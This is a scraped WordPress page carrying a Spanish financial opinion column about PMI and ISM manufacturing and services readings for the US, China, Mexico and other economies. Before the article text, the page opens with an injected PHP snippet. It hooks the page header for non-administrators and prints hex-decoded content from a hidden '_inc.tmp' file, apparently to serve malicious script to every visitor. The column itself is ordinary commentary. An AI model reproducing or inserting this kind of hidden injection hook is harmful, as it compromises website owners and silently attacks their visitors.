if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } MI OPINION FINANCIERA DE HOY – La Opinión Universitaria La Opinión Universitaria
Menu

MI OPINION FINANCIERA DE HOY

 

ARMANDO VALERDI

avalerdir@hotmail.com

Dando seguimiento a los principales factores económicos que influyen a nuestra planeación financiera, encontramos que de las grandes economías China destaca por ubicarse en zona de contracción, incluso por debajo de lo observado en diciembre, lo que habla de la profundidad de sus problemas al tratar de convertirse en una economía de consumo en lugar de una economía industrial, transformación que le está costando mucho trabajo.

Del otro lado de la moneda, las cifras de Estados Unidos de acuerdo la encuesta PMI que abarca grandes empresas trasnacionales, subió de 53.8 a 54.9 unidades, mientras que Canadá habría bajado de 53.6 a 53.0, y México también habría subido de 49.7 a 50.9 por ciento.

Al respecto hay que recordar que si bien, en teoría la marca por abajo de 50 puntos nos indica contracción del crecimiento, en la práctica lecturas entre 49 y 51 unidades están asociadas con lecturas de bajo crecimiento, y es debajo de 48 unidades cuando vemos caídas en la actividad manufacturera de los países, mientras que es entre 52 y 56 puntos donde vemos crecimiento, y por encima de 57 unidades, si bien puede haberlo, también observamos sobrecalentamiento de la economía, acompañada de presiones inflacionarias y capacidad de producción saturada.

En este sentido, Turquía, Taiwán y la poderosa Italia estarían en contracción y ninguna economía tendría problemas de calentamiento en este momento, lo que explica la baja en los precios de materias primas en general a nivel mundial, incluido el petróleo .A nivel regional destaca Brasil, que se mantiene por encima de México, así como España y Grecia, que van bien frente a la recesión italiana, que se niega a llevar a cabo reformas estructurales.

Siguiendo con los datos sobre la economía de Estados Unidos, podemos observar que la actividad económica del sector manufacturero estadounidense creció en enero, y la economía en general creció por el mes consecutivo número 117, según dijeron los ejecutivos de compras de la nación en la última encuesta Manufacturing ISM Report On Business.

El índice de los gerentes de compras del sector manufacturero que elabora el Institute for Supply Management (ISM), que mide el desempeño del sector manufacturero estadounidense, subió 2.3 puntos en enero para ubicarse en 56.6 unidades.

En términos desagregados, el componente de los nuevos pedidos subió 6.9 puntos, de 51.3 puntos en diciembre a 58.2 puntos en enero, mientras que el subíndice de la producción lo hizo en 6.4 puntos en enero para quedar en 60.5 puntos.

Asimismo, el componente del empleo registró una caída de 0.5 puntos en su variación mensual en enero contra diciembre, a 55.5 puntos.

«Los comentarios del panel reflejan una continua fortaleza en el crecimiento de la actividad empresarial, apoyada por la fuerte vista en la demanda y la producción», escribió en un comunicado Timothy R. Fiore, presidente del instituto. «La expansión de la demandas mejoró, teniendo la lectura del índice de los nuevos pedidos regresando a los altos cincuentas; al índice de los inventarios de los clientes permaneciendo muy abajo; y los pedidos pendientes por entregar permaneciendo a un nivel de expansión cerca de cero».

La actividad económica del sector de los servicios de Estados Unido creció en enero por el centésimo octavo mes consecutivo, de acuerdo al reporte que elabora el ISM. El indicador para el sector no manufacturero cayó de 58 puntos en diciembre a 56.7 puntos en enero, dijo ISM.

Esta encuesta abarca a un mayor número de empresas, no tan grandes como la muestra del PMI. En términos desagregados, el subíndice de producción o actividad económica retrocedió 1.5 puntos en enero contra diciembre al caer de 61.2 puntos en diciembre a 59.7 puntos en enero; y el de los nuevos pedidos cayó 5 puntos a 62.7 puntos, mientras que el del empleo subió 1.2 puntos, a 57.8 puntos en enero contra diciembre, dijo ISM.

No obstante que los datos sobre la economía estadounidense muestran signos favorables, no hay que olvidar que su piso de endeudamiento sigue siendo muy alto, y habrá que observar cómo se comporta en este nuevo entorno global en donde el comercio ha sido fundamental para que la economía mundial se desarrollara y creciera a través del crédito y el consumo, modelo que llego a su límite con la crisis del 2008.

Sin duda hay mucho que ver y seguir durante este recién inicio de año, por lo que habrá que estar atentos y dar seguimiento al rumbo de los factores, índices e indicadores que nos muestren su rumbo.

 

Gracias  

 

No comments

Deja una respuesta

Tweets recientes